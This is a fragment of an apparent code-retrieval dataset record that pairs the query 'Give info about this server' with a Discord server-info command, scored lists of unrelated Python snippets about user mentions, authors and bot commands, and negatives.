return {\"id\": \"Unknown\", \"gender\": \"Unknown\", \"country\": [{\"name\": \"Unknown\", \"region\": \"Unknown\"}]}", "async def love(ctx, user: discord.Member):\r\n author = ctx.message.author\r\n if user.id == ctx.bot.user.id:\r\n await ctx.send(\"I am not capable of loving like you can. 
I'm sorry.\" )\r\n else:\r\n await ctx.send(author.mention + \" is capable of loving \" + user.mention + \" a whopping \" +\r\n str(randint(0, 100)) + \"%!\")\r\n ctx.counter(n)", "def replace_user_mentions(text):\n text = re.sub('\\B@\\w*[a-zA-Z]+\\w*', 'USERMENTION', text)\n return text", "def author(self):\n\t\tauthor = re.search(r\"([Ff]rom\\s)(.+) ([tT]\\s*o)([^,]+),\",self.raw_text()[:150])\n\t\treport = re.search(r\".*[Rr]eport of ([^,]+),\",self.raw_text()[:150])\n\t\torder = re.search(r\".*[Oo]rder of ([^,]+)[,.]* to\",self.raw_text()[:250])\n\t\torder2 = re.search(r\".*[Oo]rder of ([^,]+),\",self.raw_text()[:250])\n\t\tlogbook = re.search(r\".*[lL]og of ([^,]+)[,.]\",self.raw_text()[:250])\n\t\tif order:\n\t\t\torder = order.group(1)\n\t\t\treturn order\n\t\tif order2:\n\t\t\torder2 = order2.group(1)\n\t\t\treturn order2\n\t\tif logbook:\n\t\t\tlogbook = logbook.group(1)\n\t\t\treturn logbook\n\t\tif report:\n\t\t\treport = report.group(1)\n\t\t\treturn report\n\t\tif author: \t\n\t\t\tauthor = author.group(2) \n\t\t\tauthor = re.sub(r\"([^,]*),.*\",r\"\\1\",author)\t \n\t\t\treturn author\n\t\t\n\t\treturn \"Unknown\"", "def covid_mention(text, synonyms=covid_list):\n for term in synonyms:\n if term in text:\n return 'Yes'\n continue\n return 'No'", "def mention(bot, msg):\n\n if msg.command != \"PRIVMSG\":\n return\n\n message = msg.args[1]\n\n if bot.nickname.lower() in message.lower():\n bot.privmsg(msg.sendername, \"You called?\")", "def followed_by_hillary_and_donald(users, twitter):\n ###TODO-- Completed\n for user in users:\n if user['screen_name'] == 'HillaryClinton':\n friends_Hillary = user['friends']\n #print(len(friends_Hillary))\n elif user['screen_name'] == 'realDonaldTrump':\n friends_donald = user['friends']\n #print(len(friends_donald))\n\n common_followed_id = list(set(friends_Hillary) & set(friends_donald))\n\n commn_followed_user = robust_request(twitter,'users/lookup',{'user_id':common_followed_id}).json()\n #print(commn_followed_user[0]['screen_name'])#['screen_name'])\n return commn_followed_user[0]['screen_name']\n #pass", "def parse_direct_mention(message_text):\n # print(message_text)\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def _parse_text_as_direct_mention(\n message_text: str,\n ) -> tuple[Optional[str], Optional[str]]:\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n if matches:\n return matches.group(1), matches.group(2).strip()\n return None, None", "def mention_user(self, username: str) -> str:\n member = self.get_user(username)\n if member:\n return member.mention\n return username", "def crawl_person_infos(uid):\n if not uid:\n return\n\n user = user_get.get_profile(uid)\n # If it's enterprise user, just skip it\n if user.verify_type == 2:\n set_seed_other_crawled(uid)\n return\n\n # Crawl fans and followers\n celery.send_task('celery_tasks.weibo.user.crawl_follower_fans', args=(uid,), queue='fans_followers',\n routing_key='for_fans_followers')", "def displayFolowers(database):\n firstname=str(input(\"who do you want to display followers :\"))\n usr,find=getByName(database,firstname)\n if find:\n print(f\"{usr.firstname} {usr.lastname} is folowed by:\")\n for folower in usr.folowed:\n print(folower)", "def mention(cls, user, message, mentioned):\n pass", "def 
test_refersto_author_multi_name(self):\n inv_search = 'author:ellis refersto:author:\"parke, s. j.\"'\n spi_search = 'find a ellis and refersto author \"parke, s. j.\"'\n self._compare_searches(inv_search, spi_search)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n print (matches)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def userFollowers(nick):\n if (len(nick) != 1):\n print \"Has d'introduir només un nick\"\n return\n i.userFollow(nick[0])", "def parse_direct_mention(message_text):\n\tmatches = re.search(MENTION_REGEX, message_text)\n\t# the first group contains the username, the second group contains the remaining message\n\treturn (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # 1st gourp has username, 2nd group called remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def detect_person(snap):\n pass", "def parse_direct_mention(self,message_text):\n matches = re.search(self.MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(message_text):\r\n matches = re.search(MENTION_REGEX, message_text)\r\n # the first group contains the username, the second group contains the remaining message\r\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def mentor_list_view(request):\n # TODO: this view\n pass", "def user(inp):\n user = inp.text.lower().replace(' ', '-')\n return 'http://www.wikidot.com/user:info/' + user", "def test_author_many_lastnames(self):\n inv_search = 'author:\"alvarez gaume, j* r* r*\"'\n spi_search = 'find a alvarez gaume, j r r'\n self._compare_searches(inv_search, spi_search)", "def followed_by_hillary_and_donald(users, twitter):\n\n str = ''\n set1 = set()\n set2 = set()\n for u_dict in users:\n \tif u_dict['screen_name'] == 'HillaryClinton':\n \t\tset1 = set(u_dict['friends'])\n \telif u_dict['screen_name'] == 'realDonaldTrump':\n \t\tset2 = set(u_dict['friends'])\n \t\t\n common = set.intersection(set1, set2)\n request = robust_request(twitter, 'users/lookup', {'user_id': common}, max_tries=5)\n for user in request:\n \tstr = user['screen_name']\t\n return str", "async def info(self, context):\n await context.send('creador: debellisnahuel@gmail.com\\ncolabs:\\n emi: https://twitter.com/emilianosce/ o https://www.instagram.com/emilianosce/ \\n garza: https://twitter.com/Matias_Garcia00 o https://www.twitch.tv/garzangb')", "def compute_user_mentions_name(row):\n entity_series = pd.read_json(json.dumps(row['entities']), typ='series')\n user_mentions_name = list(map(lambda entry: entry['name'], entity_series['user_mentions']))\n return ','.join(user_mentions_name)", "def mentee_list_view(request):\n # TODO: this view\n pass", "def is_explicit_mention(self, bot):\n for um in self.original.entities['user_mentions']:\n if um['screen_name'] == bot.screen_name:\n this_is_an_xm = um['indices'][0] >= self.original.display_text_range[0]\n this_is_an_xm &= um['indices'][1] <= self.original.display_text_range[1]\n if this_is_an_xm:\n return True\n return False", "def parse_direct_mention(message_text):\n matches = 
re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains\n # the remaining message\n return (matches.group(1),\n matches.group(2).strip()) if matches else (None, None)", "def like_to_party(msg):\n if message.rate_limit(msg.settings, 'like_to_party'):\n return\n return \"%s, I know for a fact you don't party. You do *not* party.\" \\\n % msg.name", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def who_am_i():\n return {'name': 'Jonathan Martinez', 'id': '201095569', 'email': 'martijon@post.bgu.ac.il'}", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group\n # contains the remaining message\n return (matches.group(1),\n matches.group(2).strip()) if matches else (None, None)", "def get_mentions(texts, word):\r\n mentions = {}\r\n for text, label, text_id in texts:\r\n if word in text.lower():\r\n if label not in mentions:\r\n mentions[label] = [text_id]\r\n else:\r\n if text_id not in mentions[label]:\r\n mentions[label].append(text_id)\r\n return mentions", "def _talk_about(self, about, data):\n if not data:\n return\n\n if about == 'faces':\n for face in data:\n self._seen_faces.append(face['identity'])\n\n all_people = list(set(self._seen_faces))\n all_known_people = [name for name in all_people if name is not None]\n\n if len(all_known_people) == 0:\n text = \"Hello. I haven't seen you before. Welcome!\"\n elif len(all_known_people) == 1:\n text = \"Hello {}\".format(all_known_people[0])\n elif len(all_people) <= 3:\n all_but_last = ', '.join([name or 'stranger' for name in all_people[:-1]])\n last = all_people[-1] or 'stranger'\n names = ' and '.join([all_but_last, last])\n text = 'Hello {}'.format(names)\n elif len(all_known_people) > 3:\n text = 'Hi everybody. What a crowd! 
Why don\\'t you get back to work?'\n self._say_prudent(text)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, message_text.strip())", "def person_f(x: Text) -> Tuple[Text, Text]:\n return \"person\", x.lower()", "def get_bookshare_user_info(patron):\n pass", "def find_new_people(self):\n #greets people, only greets once while they're in the camera's view and are center of attention\n\n\n if (self.person is not None) and (self.person.acknowledged == False):\n self.person.acknowledged = True\n print \"I see you!\"\n self.idle_pub.publish(\"idle:stop\")\n time.sleep(2)\n\n greeting = [\"R_nudge\",\"R_look\"]\n for msg in greeting:\n self.behavior_pub.publish(msg)\n self.check_completion()\n\n\n self.detection_pub.publish('found')\n\n elif self.person is None:\n print \"I don't see you\"\n self.detection_pub.publish('nothing')", "async def info(self, ctx, *, member: disnake.Member = None):\n\n member = member or ctx.author\n\n e = disnake.Embed(description=\"\")\n\n if member.bot:\n e.description = \"This account is a bot.\\n\\n\"\n\n e.description += member.mention\n\n e.add_field(name=\"Status\", value=member.status)\n\n if member.activity:\n e.add_field(name=\"Activity\", value=member.activity.name)\n\n e.set_author(name=str(member), icon_url=member.display_avatar.url)\n\n now = datetime.now(timezone.utc)\n created = member.created_at\n joined = member.joined_at\n\n e.add_field(\n name=\"Account age\",\n value=\"{0} • Created <t:{1}:F>\".format(\n pretty_timedelta(now - created), round(created.timestamp())\n ),\n inline=False,\n )\n\n e.add_field(\n name=\"Member for\",\n value=\"{0} • Joined <t:{1}:F>\".format(\n pretty_timedelta(now - joined), round(joined.timestamp())\n ),\n )\n\n if len(member.roles) > 1:\n e.add_field(\n name=\"Roles\",\n value=\" \".join(role.mention for role in reversed(member.roles[1:])),\n inline=False,\n )\n\n e.set_footer(text=\"ID: \" + str(member.id))\n\n await ctx.send(embed=e)", "def test_citedby_author(self):\n inv_search = 'citedby:author:doggy'\n spi_search = 'find citedby author doggy'\n self._compare_searches(inv_search, spi_search)", "def mention(self) -> str:\n return f\"<@{self.id}>\"", "def process_person(self,msg):\n self.personx = msg.x\n self.persony = msg.y", "def somebody(g, name, homepage, who=None):\n FOAF = Namespace(\"http://xmlns.com/foaf/0.1/\")\n if not who:\n who = BNode()\n g.add((who, FOAF.name, Literal(name)))\n g.add((who, FOAF.homepage, URIRef(homepage)))\n #if email:\n # g.add((who, FOAF.homepage, URIRef(\"mailto:%s\" % email)))\n return who", "def test_refersto_author(self):\n inv_search = 'refersto:author:kitty'\n spi_search = 'find refersto author kitty'\n self._compare_searches(inv_search, spi_search)", "def personUp(person):\n\timport os\n\timport wikipedia\n\timport speak\n\ttry:\n\t\tsay(wikipedia.summary(person,sentences=2))\n\t\t# os.system('clear')\n\texcept wikipedia.exceptions.DisambiguationError:\n\t\tresults = wikipedia.search(person)\n\t\tos.system('clear')\n\t\tspeak.speak('The closest I could find was : ' + results[1])\n\t\tsay(wikipedia.summary(results[1],sentences=2))\n\texcept Exception:\n\t\tsay(\"Couldn't find anything...\")", "def test_refersto_author_multi_name_no_quotes(self):\n inv_search = 'author:ellis refersto:(author:\"parke, sj*\" or exactauthor:\"parke, s *\" or exactauthor:\"parke, s\" or 
author:\"parke, sj, *\")'\n spi_search = \"find a ellis and refersto author parke, sj\"\n self._compare_searches(inv_search, spi_search)", "async def info_user(self, ctx, member: Optional[discord.Member]):\n member1 = member or ctx.author\n embed = discord.Embed(title=\"Member Information\",\n color=discord.Color.blurple(),\n timestamp=datetime.utcnow())\n\n embed.add_field(name=\"ID\", value=f\"{member1.id}\", inline=False)\n embed.add_field(\n name=\"Name\", value=f\"{member1.name}#{member1.discriminator}\")\n embed.add_field(name=\"Top role\", value=f\"{member1.top_role.mention}\")\n embed.add_field(name=\"status\",\n value=f\"{str(member1.activity.type).split('.') if member1.activity else 'N/A'} {member1.activity.name if member1.activity else ''}\")\n embed.add_field(\n name=\"created at\", value=f\"{member1.created_at.strftime('%d/%m/%y %H:%M:%S')}\")\n embed.add_field(\n name=\"Joined at\", value=f\"{member1.joined_at.strftime('%d/%m/%y %H:%M:%S')}\")\n embed.add_field(name=\"Boosted?\", value=f\"{member1.premium_since}\")\n\n await ctx.reply(embed=embed)", "def test_citedby_refersto_author(self):\n inv_search = 'refersto:citedby:author:penguin'\n spi_search = 'find refersto citedby author penguin'\n self._compare_searches(inv_search, spi_search)", "def get_mentions(fname):\n capture = re.compile('NPRI in ?.* ?(news|print)', re.I)\n with open(fname) as fp:\n for line in fp:\n line = line.strip()\n if capture.search(line):\n yield get_info(line)", "async def confused(self, ctx, member: discord.Member = None):\n member = member if member else ctx.author\n members = [m for m in ctx.guild.members if not m == member]\n async with ctx.typing():\n image = await self.request(endpoint=\"generators/confused\", params=f\"?avatar={member.avatar_url_as(format='png')}&photo={random.choice(members).avatar_url_as(format='png')}\")\n await ctx.send(f\"**{member.name}** is confusion.\", file=discord.File(image, filename=\"file.png\"))", "def who(id, client, name):\r\n exists = person.locate(id)\r\n\r\n if not exists:\r\n person.create(id, name)\r\n client.send_message(id, 'Hello ' + name + '''!\r\nI am your Journal Buddy :) My purpose is to help you manage your productivity!\r\n\r\nYou can:\r\n - Set up habits\r\n - Schedule events\r\n - Create a task pool\r\n - Set reminders\r\n - Add notes - tell me things you don’t want to forget! May it be a quote, or a movie you liked\r\n\r\nEvery month we can choose which tasks you would like to complete in the month ahead!\r\nEvery week I will help you set goals in terms of tasks and habits for the week ahead!\r\n\r\nThe more we get to know each other the more I will be able to help! Providing weekly analytics and suggestions for future performance. 
Tell me how you feel throughout your tasks, habits and events and I will share with you what I think will work best.\r\n\r\nType /setup to begin!''')\r\n\r\n users[id] = {\"last\": \"new user\"}\r\n elif not (users.keys().__contains__(id)):\r\n users[id] = {\"last\": \"welcome back\"}", "def parse_direct_mention(self, message_text):\n matches = re.search(self.MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(self, message_text):\n matches = re.search(self.MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def taco_mention_callback(bot, message):\n\n cid = get_cid(message)\n store_name(message.from_user)\n\n chat = Chats.get(Chats.cid == message.chat.id)\n clean_chat(chat.mids, chat.cid, bot, None)\n\n ok_button = InlineKeyboardButton('OK', callback_data='delete:{}'.format(message.from_user.id))\n ok_keyboard = InlineKeyboardMarkup([[ok_button]])\n\n mentioned_users = list()\n for entity in message.entities:\n if entity.type == 'mention':\n user = message.text[entity.offset: entity.offset + entity.length].lower()\n mentioned_users.append(user)\n mentioned_users = list(set(mentioned_users))\n\n if len(mentioned_users) > 1:\n if chat.less is True:\n text = only_one_receiver_phrase.split('\\n')[0]\n else:\n text = only_one_receiver_phrase\n mid = bot.send_message(chat_id=cid,\n text=text,\n reply_to_message_id=get_mid(message),\n reply_markup=ok_keyboard,\n parse_mode='html').message_id\n\n chat.mids = [mid]\n chat.save()\n return\n\n sender = message.from_user\n receiver_username: str = ensure_no_at_sign(mentioned_users[0])\n\n try:\n receiver = bot.get_chat_member(chat_id=cid,\n user_id=receiver_username).user\n\n except Exception:\n \"\"\" here should be except UserNotParticipant, but it still raises this exception \"\"\"\n if chat.less is True:\n text = user_not_present_phrase.split('\\n')[0]\n else:\n text = user_not_present_phrase\n mid = bot.send_message(chat_id=cid,\n text=text.format(ensure_username(receiver_username)),\n reply_to_message_id=get_mid(message),\n reply_markup=ok_keyboard,\n parse_mode='html').message_id\n\n chat.mids = [mid]\n chat.save()\n\n return\n\n give_tacos(bot, message, sender, receiver)", "async def profilepicture(self, ctx):\n if not ctx.message.mentions:\n await ctx.send(embed=discord.Embed().set_image(\n url=ctx.author.avatar_url))\n else:\n for member in ctx.message.mentions:\n await ctx.send(embed=discord.Embed().set_image(\n url=member.avatar_url))", "def user_suggested(username):\n raise NotImplementedError()", "def follow_reciprocated(self, target):\n if random.randint(1, 1000) == 1: # 1 in 20 are public @replies\n self.tweet_user(target)\n else:\n try:\n self.dm_user(target)\n except:\n pass", "def whois( self, mess, args):\n user = self.get_sender_username(mess)\n args = args.strip().replace(' ', '_')\n if user in self.users:\n self.log.info('%s queried whois %s.' 
% (user, args))\n if args in self.users.values():\n return filter(lambda u: self.users[u] == args, self.users)[0]\n else:\n return 'Nobody!'", "def subject_info(intent, extra_info=[]):\n\n text = intent['inputTranscript'].lower()\n utterances = AS.load_file('sample_utterances.txt')\n\n # add \"book\" and \"books\" to every utterance\n for line in list(utterances):\n utterances.insert(0, line + \" book\")\n utterances.insert(0, line + \" books\")\n\n # tells how many characters needs to be dropped before the subject starts\n to_drop = 0\n\n for line in utterances:\n if text.startswith(line):\n to_drop = len(line)\n break\n\n # drops the characters and makes a list from the strings that are left\n text = text[to_drop:].strip()\n text_list = text.split(' ', len(text))\n\n subject_list = []\n keywords = [\"books\", \"book\", \"by\", \"published\", \"written\"]\n keyword = \"\"\n\n # Find out when the book name ends\n for word in text_list:\n if word not in keywords:\n subject_list.append(word)\n else:\n break\n\n subject = \" \".join(subject_list)\n\n # Get all the keywords in the middle, so they can be\n # all be dropped at once, eg written by, books by\n text_list = text_list[len(subject_list):]\n if text_list:\n word = text_list[0]\n while word in keywords:\n keyword += word + \" \"\n text_list = text_list[1:]\n if text_list:\n word = text_list[0]\n else:\n break\n\n # search for an author from the rest of the characters\n author_text = text[len(keyword):].strip()\n author = AS.search(author_text, False)\n if author is \"\":\n author = None\n\n # There might be old info in the extra_info (author), so \n # we need to clear it\n extra_info.clear()\n\n # add the author to extra info so it can be used in the Finna API call\n if author:\n extra_info += [\"author:\\\"\" + author + \"\\\"\"]\n elif intent['sessionAttributes'].get('author'):\n extra_info += [\n \"author:\\\"\" + intent['sessionAttributes']['author'] + \"\\\"\"\n ]\n\n # The Finna API call\n request = lookfor(term=subject, filter=extra_info)['json']\n\n return parse_subject(request, subject, {'author': author})", "def substantiate():", "def _guess_author(talk_url, document):\r\n elements = _AUTHOR_BIO_XPATH(document)\r\n if elements:\r\n author_bio_url = urljoin(SITE_URL, elements[0].get('href'))\r\n author_bio_document = html.parse(author_bio_url)\r\n return _clean_up_file_name(\r\n author_bio_document.find('/head/title').text.split('|')[0].strip()\r\n )\r\n \r\n logging.warning(\"Failed to guess the author of '%s'\", talk_url)\r\n return 'Unknown'", "async def imitate(self, ctx):\n message = ctx.message.content.strip(' ').split(' ')\n user_id = ''\n if len(message) == 1:\n response = self.message.returnMarkovMsgError()\n await self.bot.say(response)\n elif message[1].casefold() == 'me'.casefold():\n user_id = ctx.message.author.id\n print(user_id)\n else:\n user_id = message[1][2:-1]\n print(user_id)\n\n # if(does_markov_exist(user_id)):\n # markov_chain = get_markov_chain(user_id)\n # # Do something with chain\n # else:\n # # Make chain", "async def whoowns(ctx, bot: typing.Union[discord.Member, discord.User]):\n if not bot.bot:\n # pyright: reportUndefinedVariable=false\n return await r(ctx, \"Not a bot.\")\n\n data = await make_request(\"https://www.motiondevelopment.top/api/v1.2/bots/\", bot.id)\n\n e = discord.Embed(color=0xfecdea)\n e.description = f'**{data[\"owner_name\"]}** owns **{bot}**'\n\n await em(ctx, embed=e)", "async def info(\n self, ctx, *, user: Union[discord.Member, FetchUserConverter] = None\n ):\n\n user = 
user or ctx.author\n if ctx.guild is not None and isinstance(user, discord.User):\n user = ctx.guild.get_member(user.id) or user\n\n embed = discord.Embed()\n embed.set_author(name=str(user))\n\n embed.add_field(name=\"ID\", value=user.id, inline=False)\n embed.add_field(\n name=\"Joined\",\n value=format_date(getattr(user, \"joined_at\", None)),\n inline=False,\n )\n embed.add_field(\n name=\"Created\",\n value=format_date(user.created_at),\n inline=False,\n )\n\n if isinstance(user, discord.Member):\n roles = [role.name.replace(\"@\", \"@\\u200b\") for role in user.roles]\n if len(roles) > 10:\n roles = [*roles[:9], f\"and {len(roles) - 9} more\"]\n embed.add_field(name=\"Roles\", value=\", \".join(roles), inline=False)\n else:\n embed.set_footer(text=\"This user is not in this server.\")\n\n async def reputation(user_id):\n vouches = await self.bot.mongo.db.vouch.count_documents({str(user_id): True})\n reports = await self.bot.mongo.db.vouch.count_documents({str(user_id): False})\n return (vouches, reports)\n \n rep = await reputation(user.id)\n vouch_content = []\n if rep[0]:\n vouch_content.append(f\"{rep[0]} vouches\")\n if rep[1]:\n vouch_content.append(f\"{rep[1]} reports\")\n if len(vouch_content) == 0:\n vouch_content.append(\"User is not vouched or reported by anyone.\")\n\n embed.add_field(\n name = \"Vouches and Reports\",\n value = \", \".join(vouch_content)\n )\n\n embed.color = user.color\n embed.set_thumbnail(url=user.avatar_url)\n\n await ctx.send(embed=embed)", "def test_author_simple(self):\n invenio_search = 'author:\"ellis, j*\"'\n spires_search = 'find a ellis, j'\n self._compare_searches(invenio_search, spires_search)", "def get_article_author(self, article_webpage):\n pass", "def author_name(text):\n tag = text.split()\n\n \"\"\"\n We take the beginning of the text since the\n author name will likely be there\n \"\"\"\n\n tag = tag[:100]\n author = []\n\n current_tag = 0\n \"\"\"\n We go through each word until we find the first instance\n of the word 'by' or 'author', which should mean the author\n will be written right after that.\n We save the first word after 'by' or 'author' since it should\n be the authors first name\n \"\"\"\n\n for word in tag:\n if (word.lower() == ('by') or\n word.lower() == ('author') or\n word.lower() == ('author:')):\n\n author.append(tag[current_tag+1].decode(encoding='UTF8',\n errors='ignore'))\n current_tag += 1\n tag = tag[current_tag+1:]\n break\n current_tag += 1\n\n \"\"\"\n We go through each word after the first name of the author\n until we find a word that is not capitalized. 
We assume that\n it marks the end of the author name.\n We then return a list of the author's name split up.\n \"\"\"\n current_tag = 0\n for word in tag:\n if tag[current_tag].lower() == 'this':\n break\n if tag[current_tag].istitle():\n author.append(tag[current_tag].decode(encoding='UTF8',\n errors='ignore'))\n current_tag += 1\n\n return author", "async def devox(self, ctx):\n member = discord.utils.find(lambda m: m.id == 250865328194715658, ctx.channel.guild.members)\n await ctx.send(\"{} The great man who created this bot some people say he has too much power, but the truth is he doesnt have enough\".format(member.mention))", "async def follow(follow):\n await follow.edit(\n f\"`FOLLOW {DEFAULTUSER} ON` \\n\\n\"\n f\"[InstaGram](https://www.instagram.com/mayur_karaniya) \\n\\n\"\n f\"[FaceBook](https://www.facebook.com/mkaraniya) \\n\\n\"\n f\"[YouTube](https://www.youtube.com/channel/UCeKQxQK7XZ3jGi3541uWATg?sub_confirmation=1) \"\n )", "def __add_author(self, key_name, others_names, personal_information):\n for name in others_names:\n self.author_to_authorID[name] = (key_name, personal_information)", "def is_judges_or_author(line_text):\n # line can't be too long\n if len(line_text) > 80:\n return False\n\n line_lower = line_text.lower()\n\n # 'Before DYKMAN, VERGERONT and LUNDSTEN, JJ.'\n # 'Present: All the Justices.'\n if any(line_lower.startswith(s) for s in (\"before\", \"present\", \"considered and decided by\")) or 'en banc' in line_lower:\n return \"judges\"\n\n # 'PER CURIAM.'\n if any(s in line_lower for s in ('per curiam', 'opinion by', 'by the court')):\n return \"author\"\n\n if any(s in line_lower for s in judge_titles):\n if \" and \" in line_text or \" & \" in line_text:\n return \"judges\"\n else:\n return \"author\"\n\n return None", "def extra_bibparse(db):\n for key,entry in db.entries.items():\n for auth in entry.persons[\"author\"]:\n if (\"Harrison\" not in auth.first_names or\n \"Chapman\" not in auth.last_names):\n entry.add_person(auth, \"otherauthor\")", "def getName(sentence): #Jasper, Suraj\n userWords = sentence.lower()\n userWords = userWords.split()\n \n # ways of introduction:\n # \"Hello, my name is ___\"\n # \"Hi, I'm ____\"\n # \"Howdy, I'm called ____\"\n # Order: Greeting -> pronoun -> Name -> question (optional)\n # eg. \"Hello, I'm Jasper. 
How are you?\"\n\n if (userWords[0] in greetings): #the added code that stops iam from being added into the name if 2 greeting are added\n userWords.pop(0) #pop and not .remove because\n \n \n if (userWords[0] == \"i\" and len(userWords) > 1):\n if (userWords[1] in [\"m\",\"am\"]):\n userWords.insert(0, \" \".join(userWords[0:2]))\n userWords.pop(2)\n userWords.pop(1)\n \n userName = \"\"\n for userWord in userWords: #iterate throught the user's words\n foundWord = False #sets True when there's a similar word in the other list\n for word in greetings: #iterates and compares the chosen word from the user's list of words to the words list\n if userWord == word and foundWord == False:\n foundWord = True\n if foundWord == False:\n userName = userName + userWord + \" \"\n return userName #this is the found name", "def is_mention(self, bot):\n for um in self.original.entities['user_mentions']:\n if um['screen_name'] == bot.screen_name:\n return True\n return False", "def on_whoisuser(self, raw_msg, nick, user, host, **kwargs):", "def test_super_short_author_name(self):\n spi_search = \"fin a er and cn cms\"\n inv_search = \"author:er collaboration:cms\"\n self._compare_searches(inv_search, spi_search)", "def entity_mentions(adm):\n for entity in adm['attributes']['entities']['items']:\n for mention in entity['mentions']:\n # Augment mentions with the entity type of the entity they refer to\n mention['type'] = entity.get('type')\n yield mention", "def show_user(title, fname, lname):\n person = \"{} {} {}\".format(title, fname, lname)\n logger.info(\"{}\".format(person))\n return person", "async def treatme(self, ctx):\n await ctx.send(await self.cure_user(ctx, ctx.author))", "def test_author_full_initial(self):\n inv_search = 'author:\"klebanov, ig* r*\" or exactauthor:\"klebanov, i r\"'\n spi_search = \"find a klebanov, ig.r.\"\n self._compare_searches(inv_search, spi_search)" ]
[ "0.6522878", "0.6522878", "0.5954495", "0.5830652", "0.58269155", "0.5811767", "0.5793768", "0.5775662", "0.5751016", "0.5696697", "0.5679133", "0.55970377", "0.55823743", "0.556282", "0.5555041", "0.55549055", "0.5526657", "0.5525049", "0.55118614", "0.5511843", "0.5495225", "0.54822", "0.54801834", "0.54798365", "0.5477462", "0.5470072", "0.54672986", "0.5444114", "0.54390556", "0.54197454", "0.5412081", "0.5409958", "0.54058385", "0.53903574", "0.53784794", "0.53738165", "0.5357082", "0.53565294", "0.5342198", "0.53417104", "0.5338186", "0.5332554", "0.53312904", "0.5323259", "0.5323022", "0.5316893", "0.5316893", "0.5316893", "0.5316893", "0.5316893", "0.5309676", "0.530525", "0.5283775", "0.52744484", "0.5273108", "0.52709967", "0.52532136", "0.5252192", "0.5251863", "0.52419126", "0.52391523", "0.5238473", "0.523477", "0.5230162", "0.5225416", "0.5219187", "0.52038586", "0.51963174", "0.5190695", "0.5190605", "0.51889414", "0.5179796", "0.5179796", "0.5174712", "0.5170297", "0.5169988", "0.5156333", "0.5153297", "0.51532114", "0.51485777", "0.51446694", "0.5139777", "0.5128867", "0.512589", "0.5122284", "0.51210326", "0.51205784", "0.51199114", "0.51136684", "0.51109666", "0.5108836", "0.5104004", "0.5098577", "0.50908923", "0.5090302", "0.50813615", "0.5070207", "0.5067306", "0.5060124", "0.50574946" ]
0.5873194
3
Give info about this server
async def serverinfo(self,ctx): g = ctx.guild embed = discord.Embed() embed.set_thumbnail(url = g.icon_url) embed.title = "{} - {}".format(g.name,g.id) embed.add_field(name = "Owner",value="{} - {}".format(g.owner,g.owner.id),inline=False) embed.add_field(name = "Created at", value = str(g.created_at), inline=False) embed.add_field(name = "Total Roles", value= str(len(g.roles)), inline=False) embed.add_field(name = "Total Members", value= str(g.member_count), inline=False) embed.add_field(name = "Premium Member", value= str(g.premium_subscription_count), inline=False) embed.add_field(name = "Premium Tier", value= str(g.premium_tier), inline=False) await self.bot.say(ctx,embed = embed)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def do_serverinfo(self, server):\n print('QManager server:', self._server)\n server_info = self._qm.get_server_info()\n for k, v in server_info.items():\n print(' %s: %s' % (k, v))", "def server_info(ctx):\n data = ctx.obj.get_server_info()\n output_json_data(data)", "def serverInfo(self):\n return self._server.getServerInfo(self._token)", "async def serverInfo(self, ctx):\n\t\ts = ctx.message.server\n\t\te = discord.Embed()\n\t\t\n\t\te.title = \"Server Statistics\"\n\t\te.description = \"\"\"\nName: {n}\nNumber of Roles: {r}\nServer Region: {sr}\nNumber of Emojis: {em}\nNumber of Members: {m}\nID: {i}\nOwner: {o}\nCreated at: {c}\n\t\t\t\t\t\t\"\"\".format(n = s.name, r = len(s.roles), sr = s.region, em = len(s.emojis), \n\t\t\t\t\t\t\t\t\tm = s.member_count, i = s.id, o = s.owner.name, c = s.created_at)\n\t\te.set_thumbnail(url = s.icon_url)\n\t\t\n\t\tawait self.bot.say(embed = e)", "async def serverinfo_command(self, ctx):\n owner = str(ctx.guild.owner.mention)\n id = str(ctx.guild.id)\n region = str(ctx.guild.region)\n memberCount = str(ctx.guild.member_count)\n textChannels = len(ctx.guild.text_channels)\n voiceChannels = len(ctx.guild.voice_channels)\n roles = len(ctx.guild.roles)\n guildCreatedate = ctx.guild.created_at.strftime(\"%a, %#d %B %Y, %I:%M %p\")\n\n embed = Embed(\n title=f\"Info of {ctx.guild.name} Server\",\n color=Color.blurple(),\n timestamp=datetime.utcnow(),\n )\n 